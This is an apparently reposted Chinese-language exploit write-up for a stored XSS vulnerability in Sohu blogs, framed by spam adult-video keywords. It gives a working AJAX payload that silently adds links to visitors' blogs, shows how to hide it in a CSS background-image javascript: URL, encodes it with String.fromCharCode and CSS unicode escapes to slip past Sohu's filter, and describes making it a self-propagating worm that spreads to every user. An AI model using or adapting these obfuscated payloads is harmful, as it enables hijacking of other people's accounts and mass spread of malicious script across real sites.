美女韩国视频,动漫美女视频免费观看

搜狐ajax hacking漏洞詳解——XSS worm

搜狐博客存在ajax hacking漏洞，可以實現(xiàn)web worm的功能，下面是具體的利用方法：

標準的ajax數(shù)據提交，該ajax的XmlHttp方式為

微軟msdn提供的標準方法！
<script type="text/javascript">

window.onload=function()
{
var XmlHttp=new ActiveXObject("

Microsoft.XMLhttp");
XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true);
XmlHttp.send(null);
XmlHttp.onreadystatechange=ServerProcess;
}
function ServerProcess()
{
if (XmlHttp.readystate==4 || XmlHttp.readystate==‘complete‘)
{
alert(XmlHttp.responseText);
}
}
</script>

把以上代碼縮成一行
window.onload=function(){var XmlHttp=new ActiveXObject("

Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}

漏洞的利用方式
<div style="background-image:url(javascript:[code])">不能執(zhí)行多語句，所以轉到下面的方法eval進行
<div style="background-image:url(javascript:eval([code]))">有引號，所以轉到下面的方法，String.fromCharCode
<div style="background-image:url(javascript:eval(String.fromCharCode([十進制的code])))">這回完成了

在eval里，代碼可以自動執(zhí)行，因此可以不用window.onload，同時去掉函數(shù)結構！
var XmlHttp=new ActiveXObject("

Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);

將上述代碼進行String.fromCharCode轉碼
118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59

因此有如下代碼，該代碼是可以執(zhí)行的，但會被sohu過濾掉，因此需要進一步加密！
<div style="background-image:url(javascript:eval(String.fromCharCode(118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59)))">

再次加密后的結果！
<div style="BACKGROUND-image:\0075\0072\006c\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0065\0076\0061\006c\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\0064\0065\0028\0031\0031\0038\002c\0039\0037\002c\0031\0031\0034\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0036\0031\002c\0031\0031\0030\002c\0031\0030\0031\002c\0031\0031\0039\002c\0033\0032\002c\0036\0035\002c\0039\0039\002c\0031\0031\0036\002c\0031\0030\0035\002c\0031\0031\0038\002c\0031\0030\0031\002c\0038\0038\002c\0037\0039\002c\0039\0038\002c\0031\0030\0036\002c\0031\0030\0031\002c\0039\0039\002c\0031\0031\0036\002c\0034\0030\002c\0033\0034\002c\0037\0037\002c\0031\0030\0035\002c\0039\0039\002c\0031\0031\0034\002c\0031\0031\0031\002c\0031\0031\0035\002c\0031\0031\0031\002c\0031\0030\0032\002c\0031\0031\0036\002c\0034\0036\002c\0038\0038\002c\0037\0037\002c\0037\0036\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0033\0034\002c\0034\0031\002c\0035\0039\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0034\0036\002c\0037\0039\002c\0031\0031\0032\002c\0031\0030\0031\002c\0031\0031\0030\002c\0034\0030\002c\0033\0034\002c\0031\0030\0033\002c\0031\0030\0031\002c\0031\0031\0036\002c\0033\0034\002c\0034\0034\002c\0033\0034\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0035\0038\002c\0034\0037\002c\0034\0037\002c\0031\0030\0039\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0034\0036\002c\0039\0038\002c\0031\0030\0038\002c\0031\0031\0031\002c\0031\0030\0033\002c\0034\0036\002c\0031\0031\0035\002c\0031\0031\0031\002c\0031\0030\0034\002c\0031\0031\0037\002c\0034\0036\002c\0039\0039\002c\0031\0031\0031\002c\0031\0030\0039\002c\0034\0037\002c\0031\0030\0039\002c\0039\0037\002c\0031\0031\0030\002c\0039\0037\002c\0031\0030\0033\002c\0031\0030\0031\002c\0034\0037\002c\0031\0030\0038\002c\0031\0030\0035\002c\0031\0031\0030\002c\0031\0030\0037\002c\0034\0036\002c\0031\0030\0030\002c\0031\0031\0031\002c\0036\0033\002c\0031\0030\0039\002c\0036\0031\002c\0039\0037\002c\0031\0030\0030\002c\0031\0030\0030\002c\0033\0038\002c\0031\0031\0036\002c\0031\0030\0035\002c\0031\0031\0036\002c\0031\0030\0038\002c\0031\0030\0031\002c\0036\0031\002c\0037\0037\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0038\002c\0031\0030\0030\002c\0031\0030\0031\002c\0031\0031\0035\002c\0039\0039\002c\0036\0031\002c\0037\0037\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0035\002c\0031\0031\0035\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0039\002c\0031\0032\0031\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0034\002c\0031\0030\0031\002c\0031\0031\0034\002c\0031\0031\0031\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0033\0037\002c\0035\0030\002c\0034\0039\002c\0033\0038\002c\0031\0030\0038\002c\0031\0030\0035\002c\0031\0031\0030\002c\0031\0030\0037\002c\0036\0031\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0033\0037\002c\0035\0031\002c\0036\0035\002c\0034\0037\002c\0034\0037\002c\0031\0030\0034\002c\0031\0030\0035\002c\0034\0036\002c\0039\0038\002c\0039\0037\002c\0031\0030\0035\002c\0031\0030\0030\002c\0031\0031\0037\002c\0034\0036\002c\0039\0039\002c\0031\0031\0031\002c\0031\0030\0039\002c\0034\0037\002c\0031\0030\0039\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0038\002c\0039\0035\002c\0033\0034\002c\0034\0034\002c\0031\0031\0036\002c\0031\0031\0034\002c\0031\0031\0037\002c\0031\0030\0031\002c\0034\0031\002c\0035\0039\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0034\0036\002c\0031\0031\0035\002c\0031\0030\0031\002c\0031\0031\0030\002c\0031\0030\0030\002c\0034\0030\002c\0031\0031\0030\002c\0031\0031\0037\002c\0031\0030\0038\002c\0031\0030\0038\002c\0034\0031\002c\0035\0039\0029\0029\0029"></div>

加入文章后，訪問我空間的人會被自動加上鏈接，如果再在他的頁面加上window.location.href的話，就可以實在蠕蟲功能，無限制蔓延，中招的人會成為傀儡，數(shù)目也會成幾何分布增長知道蔓延到sohu的每一個用戶！

本站僅提供存儲服務，所有內容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權內容，請點擊舉報。

国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看